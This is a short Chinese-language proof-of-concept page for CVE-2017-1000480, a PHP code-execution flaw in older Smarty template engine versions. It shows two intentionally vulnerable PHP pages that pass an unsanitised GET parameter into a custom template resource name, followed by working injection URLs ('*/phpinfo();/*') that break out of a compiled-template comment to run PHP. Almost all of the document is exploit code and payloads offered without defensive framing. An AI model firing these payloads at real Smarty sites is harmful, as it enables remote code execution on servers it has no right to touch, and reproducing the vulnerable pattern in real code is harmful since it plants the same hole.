Smarty<=3.1.31 命令执行RCE CVE-2017-1000480

Smarty <= 3.1.32 PHP代码执行漏洞

例如以下网页代码

<?php
require './vendor/autoload.php';

class Smarty_Resource_Widget extends Smarty_Resource_Custom
{
    protected function fetch($name, &$source, &$mtime)
    {
        $template = "Smarty <=3.1.31 RCE (CVE-2017-1000480)";
        $source = $template;
        $mtime = time();
        return 'mochazz';
    }
}
$smarty = new Smarty();
$smarty->setCacheDir('cache');
$smarty->setCompileDir('compile');
$smarty->setTemplateDir('templates');

$my_security_policy = new Smarty_Security($smarty);
$smarty->enableSecurity($my_security_policy);
$smarty->registerResource('username', new Smarty_Resource_Widget());
$smarty->display('username:'.$_GET['mochazz']);
?>

通过该index.php中的mochazz进行传参

POC

根据以上代码，POC如下

http://192.168.1.1/index.php?mochazz=*/phpinfo();/*

POC2

例如网页代码如下

<?php
highlight_file(__FILE__);
define('HOST_DIR', __DIR__ . '/');
define('SMARTY_LIBS', HOST_DIR . 'smarty/Smarty.class.php');
define('SMARTY_COMPILE_DIR', HOST_DIR . 'app/templates_c');
define('SMARTY_CACHE_DIR', HOST_DIR . 'app/cache');

require_once(SMARTY_LIBS);

class testSmarty extends Smarty_Resource_Custom
{
    protected function fetch($name, &$source, &$mtime)
    {
        $template = "Look at CVE-2017-1000480!";
        $source = $template;
        $mtime = time();
    }
}
$smarty = new Smarty();

$smarty->registerResource('test', new testSmarty);
$smarty->display('test:'.$_GET['eval']);
?>

payload如下：

/index.php?eval=*/phpinfo();/*